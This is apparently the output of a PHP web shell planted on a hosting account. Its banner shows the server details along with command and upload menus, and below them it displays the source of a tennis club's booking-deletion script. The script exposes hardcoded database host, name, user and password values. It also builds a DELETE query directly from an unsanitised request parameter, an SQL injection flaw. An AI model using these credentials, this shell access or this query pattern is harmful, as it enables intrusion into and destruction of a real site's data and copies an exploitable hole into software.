|
Server IP : 10.111.20.6 / Your IP : 216.73.217.121 Web Server : Apache System : Linux webm006.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64 User : edizioni ( 7252) PHP Version : 8.3.23 Disable Function : _dyuweyrj4,_dyuweyrj4r,dl MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0705) : /home/edizioni/stampaeweb/../wordpress/../extonymask/figurine/../ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Circolo Tennis Ribera</title>
<link rel="stylesheet" href="classifica.css">
<link rel="stylesheet" href=css/simplex.css>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.7.2/css/all.min.css">
</head>
<?php
$id = $_REQUEST['id'];
include_once('mysql-fix.php');
require_once("support/funformat.php");
include('funzioni.php');
$dbhost1 = "edizionitonym4sk.mysql.db"; $dbname1 = "edizionitonym4sk"; $dbuser1 = "edizionitonym4sk"; $dbpass1 = "Didier0533";
$conn1 = mysql_connect($dbhost1,$dbuser1,$dbpass1)
or die("Impossibile collegarsi al server MySQL.");
mysql_select_db($dbname1,$conn1)
or die("Impossibile selezionare il database $dbname");
$sql1 = "DELETE FROM circolo_orari WHERE id=$id";
//echo $sql1;
$e = esegui_query($sql1);
?>
<body>
<div style="text-align:center; font-size:30px; margin-top:5%">
<p style="text-align:center"><img src="imgtennisti/logosito.png"></p>
<h1>Prenotazione eliminata</h1>
<a href="cale.php" target="_SELF"><button type="button" class="btn btn-warning btn-sm">Calendario</button> </a>
</div>
</body>
</html>